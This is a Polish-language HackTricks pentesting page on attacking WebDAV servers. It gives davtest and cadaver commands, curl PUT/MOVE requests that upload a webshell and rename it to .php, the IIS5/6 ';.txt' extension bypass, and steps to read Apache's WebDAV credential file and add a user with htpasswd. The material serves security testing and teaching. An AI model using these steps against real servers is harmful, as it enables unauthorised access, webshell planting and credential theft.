7.3 KiB
WebDav
Użyj Trickest do łatwego tworzenia i automatyzacji prac przy użyciu najbardziej zaawansowanych narzędzi społecznościowych na świecie.
Otrzymaj dostęp już dziś:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Zacznij od zera i zostań mistrzem hakowania AWS z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLANY SUBSKRYPCYJNE!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud github repos.
Podczas pracy z serwerem HTTP z włączonym WebDav, możliwe jest manipulowanie plikami, jeśli masz odpowiednie poświadczenia, zazwyczaj weryfikowane za pomocą HTTP Basic Authentication. Przejęcie kontroli nad takim serwerem często wiąże się z wgrywaniem i uruchamianiem webshell.
Dostęp do serwera WebDav zazwyczaj wymaga ważnych poświadczeń, a bruteforce WebDav jest powszechną metodą ich pozyskania.
Aby przezwyciężyć ograniczenia dotyczące wgrywania plików, zwłaszcza te uniemożliwiające wykonanie skryptów po stronie serwera, możesz:
- Wgrać pliki z rozszerzeniami wykonywalnymi bezpośrednio, jeśli nie są ograniczone.
- Zmienić nazwę wgranych plików niebędących wykonywalnymi (np. .txt) na rozszerzenie wykonywalne.
- Skopiować wgrane pliki niebędące wykonywalnymi, zmieniając ich rozszerzenie na takie, które jest wykonywalne.
DavTest
Davtest próbuje wgrać kilka plików z różnymi rozszerzeniami i sprawdza, czy rozszerzenie jest wykonywane:
davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension
Cadaver
Możesz użyć tego narzędzia do połączenia z serwerem WebDav i wykonywania działań (takich jak przesyłanie, przenoszenie lub usuwanie) ręcznie.
cadaver <IP>
Zapytanie PUT
curl -T 'shell.txt' 'http://$ip'
Żądanie MOVE
curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
Użyj Trickest, aby łatwo tworzyć i automatyzować zadania przy użyciu najbardziej zaawansowanych narzędzi społeczności.
Otrzymaj dostęp już dziś:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Podatność WebDav w IIS5/6
Ta podatność jest bardzo interesująca. WebDav nie pozwala na przesyłanie ani zmianę nazwy plików z rozszerzeniem .asp. Jednak można to obejść, dodając na końcu nazwy ";.txt", a plik zostanie wykonany jak plik .asp (można również użyć ".html" zamiast ".txt", ale NIE zapomnij o ";").
Następnie możesz przesłać swoją powłokę jako plik ".txt" i skopiować/przenieść go do pliku ".asp;.txt". Po dostępie do tego pliku przez serwer WWW, zostanie wykonany (cadaver powie, że akcja przeniesienia nie powiodła się, ale tak naprawdę się udała).
Dane uwierzytelniające po
Jeśli Webdav korzystał z serwera Apache, powinieneś sprawdzić skonfigurowane witryny w Apache. Zazwyczaj:
/etc/apache2/sites-enabled/000-default
Wewnątrz możesz znaleźć coś takiego:
ServerAdmin webmaster@localhost
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
DAV On
AuthType Digest
AuthName "webdav"
AuthUserFile /etc/apache2/users.password
Require valid-user
Jak widać, są pliki z prawidłowymi dane uwierzytelniające do serwera webdav:
/etc/apache2/users.password
Wewnątrz tego typu plików znajdziesz nazwę użytkownika i hash hasła. Są to dane uwierzytelniające, których serwer WebDAV używa do uwierzytelniania użytkowników.
Możesz spróbować je złamać, lub dodać więcej, jeśli z jakiegoś powodu chcesz uzyskać dostęp do serwera WebDAV:
htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password
Aby sprawdzić, czy nowe dane uwierzytelniające działają, możesz wykonać:
wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q
Odnośniki
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLANY SUBSKRYPCYJNE!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud github repos.
Użyj Trickest, aby łatwo tworzyć i automatyzować przepływy pracy zasilane przez najbardziej zaawansowane narzędzia społecznościowe na świecie.
Otrzymaj dostęp już dziś:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}